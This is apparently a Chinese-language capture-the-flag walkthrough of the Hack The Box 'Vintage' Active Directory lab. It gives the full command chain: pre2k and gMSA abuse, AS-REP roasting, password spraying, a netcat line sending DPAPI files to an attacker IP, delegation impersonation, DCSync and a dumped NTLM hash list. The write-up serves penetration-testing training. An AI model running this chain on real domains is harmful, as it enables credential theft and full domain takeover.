基本信息
1 As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
端口扫描 没有web端口,常规域端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 $ nmap -sC -sV -Pn 10.10.11.45 Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 13:45 CST Nmap scan report for 10.10.11.45 Host is up (0.074s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-02 05:32:39Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-12-02T05:32:46 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: -13m49s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds
bloodhound 因为给了初始账号密码,直接添加hosts后先跑bloodhound:
1 2 3 10.10.11.45 vintage.htb dc01.vintage.htb faketime -f "-13m" bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -c All --zip --dns-tcp -ns 10.10.11.45
bloodhound暂时没什么直接路径
users.txt 可以从bloodhound整理,也可以这样:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 faketime -f "-13m" nxc smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt Administrator Guest krbtgt DC01$ gMSA01$ FS01$ M.Rossi R.Verdi L.Bianchi G.Viola C.Neri P.Rosa svc_sql svc_ldap svc_ark C.Neri_adm L.Bianchi_adm
pre2k 这里是在添加主机时勾选了将此计算机帐户指定为Windows 2000 之前的计算机,导致自动使用主机名作为密码:
利用这种方式发现FS01,得到一个ccache:
1 2 3 faketime -f "-13m" pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile ../users.txt -verbose [14:24:44] INFO VALID CREDENTIALS: vintage.htb\FS01$:fs01
FS01 to GMSA 之后就使用前面得到的fs01票据进行操作:
1 export KRB5CCNAME=FS01\$.ccache
根据bloodhound,fs01是domain computers,可以读gmsa:
读gmsa得到gmsa01$:
1 2 3 faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword 54311f0ed05b807a7aaf5943b595f224
GMSA01 之后就为gmsa01申请票据,进行后续操作:
1 2 3 faketime -f "-13m" python3 examples/getTGT.py vintage.htb/'GMSA01$' -hashes :54311f0ed05b807a7aaf5943b595f224 export KRB5CCNAME=GMSA01\$.ccache
gmsa01对SERVICEMANAGERS有GenericWrite:
我们可以对这个组做操作,例如添加用户
然后SERVICEMANAGERS对几个svc账户有GenericAll,我们可以对其修改属性之类,而用户中我们可以看到一个禁用的SVC_SQL,所以我们可以把禁用的用户进行启用:
SERVICEMANAGERS 首先添加用户到SERVICEMANAGERS组中:
1 faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
SVC_XXX 然后使用我们添加的P.Rosa对几个svc账号进行操作
1 2 3 4 5 6 7 8 9 10 faketime -f "-13m" python3 examples/getTGT.py vintage.htb/P.Rosa:Rosaisbest123 export KRB5CCNAME=P.Rosa.ccache # 设置几个账号不需要preauth,后续进行asrep roast faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH # 启用SVC_SQL faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE
asrep roast 已经对几个账号添加了不需要preauth,接下来就是asrep rosating:
1 faketime -f "-13m" python3 examples/GetNPUsers.py -request -format hashcat -usersfile users.txt vintage.htb/
得到的hash进行破解,得到svc_sql密码:
1 2 3 sudo hashcat -m 18200 hash.txt ~/Tools/dict/rockyou.txt Zer0the0ne
C.Neri & user flag 使用破解出的密码进行喷洒,发现C.Neri使用相同密码:
1 2 3 4 faketime -f "-13m" ./kerbrute_darwin_amd64 --dc vintage.htb -d vintage.htb -v passwordspray users.txt Zer0the0ne 2024/12/02 15:04:56 > [+] VALID LOGIN: svc_sql@vintage.htb:Zer0the0ne 2024/12/02 15:04:56 > [+] VALID LOGIN: C.Neri@vintage.htb:Zer0the0ne
之后使用得到的账号密码登录即可,因为只支持kerberos认证,需要修改一下配置文件:
1 2 3 4 5 6 7 8 # 这部分换kali操作了,mac有点问题 sudo ntpdate -s 10.10.11.45 impacket-getTGT vintage.htb/C.Neri:Zer0the0ne export KRB5CCNAME=C.Neri.ccache sudo nano /etc/krb5.conf evil-winrm -i dc01.vintage.htb -r vintage.htb
krb5.conf 1 2 3 4 5 6 7 8 9 10 11 12 [libdefault] default_realm = VINTAGE.HTB [realms] VINTAGE.HTB = { kdc = dc01.vintage.htb admin_server = dc01.vintage.htb } [domain_realm] vintage.htb = VINTAGE.HTB .vintage.htb = VINTAGE.HTB
C.Neri_ADM 然后查看用户可以发现C.Neri还有个adm用户
DPAPI 这里就是模拟现实场景,同一个人日常使用普通账户,需要高权限操作时切换到管理员账户,但为了方便操作保存了凭据,常规dpapi
但机器有杀软,把相关文件下载到本地操作即可:
1 2 3 4 5 *Evil-WinRM* PS C:\Users\C.Neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> Get-ChildItem -Force cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"
之后就是本地解dpapi:
1 2 3 4 5 6 python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a Username : vintage\c.neri_adm Unknown : Uncr4ck4bl3P4ssW0rd0312
DELEGATEDADMINS 之后使用c.neri_adm进行操作:
1 2 faketime -f "-13m" python3 examples/getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 export KRB5CCNAME=c.neri_adm.ccache
可以看到对DELEGATEDADMINS组有GenericWrite权限,我们可以向其中添加用户:
那我们如果添加一个设置了spn的svc用户,就可以委派模拟其他用户,另外可以看到L.BIANCHI_ADM有dcsync权限,可以作为我们的目标用户:
add svc to DELEGATEDADMINS 1 2 3 4 5 6 7 # 使用前面的servicemanagers票据 export KRB5CCNAME=P.Rosa.ccache faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k set object 'SVC_SQL' servicePrincipalName -v "cifs/x" # 使用c.neri_adm export KRB5CCNAME=c.neri_adm.ccache faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
impersonate & dcsync 然后就使用svc_sql模拟L.BIANCHI_ADM:
1 2 3 4 5 6 7 8 9 10 11 12 # sql_svc如果已经被自动禁用了,重新启用一下 # 一系列操作快速完成 faketime -f "-13m" python3 examples/getTGT.py vintage.htb/svc_sql:Zer0the0ne export KRB5CCNAME=svc_sql.ccache faketime -f "-13m" python3 examples/getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne' export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache # dcsync faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -just-dc-user Administrator -k -no-pass 468c7497513f8243b59980f2240a10de
root flag Administrator实际上不能登录,还是使用L.BIANCHI_ADM:
1 2 export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache faketime -f "-13m" python3 examples/wmiexec.py L.BIANCHI_ADM@dc01.vintage.htb -k -no-pass
hashdump 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -k -no-pass Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8::: M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d::: R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57::: L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545::: G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf::: C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639::: P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2::: svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639::: svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa::: svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf::: C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594::: L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:b0e2eccf559f2be2120e9bce41a51e2c::: DC01$ :1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5::: gMSA01$ :1107:aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224::: FS01$ :1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
参考资料
最終更新:2025-05-02 17:51:51
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会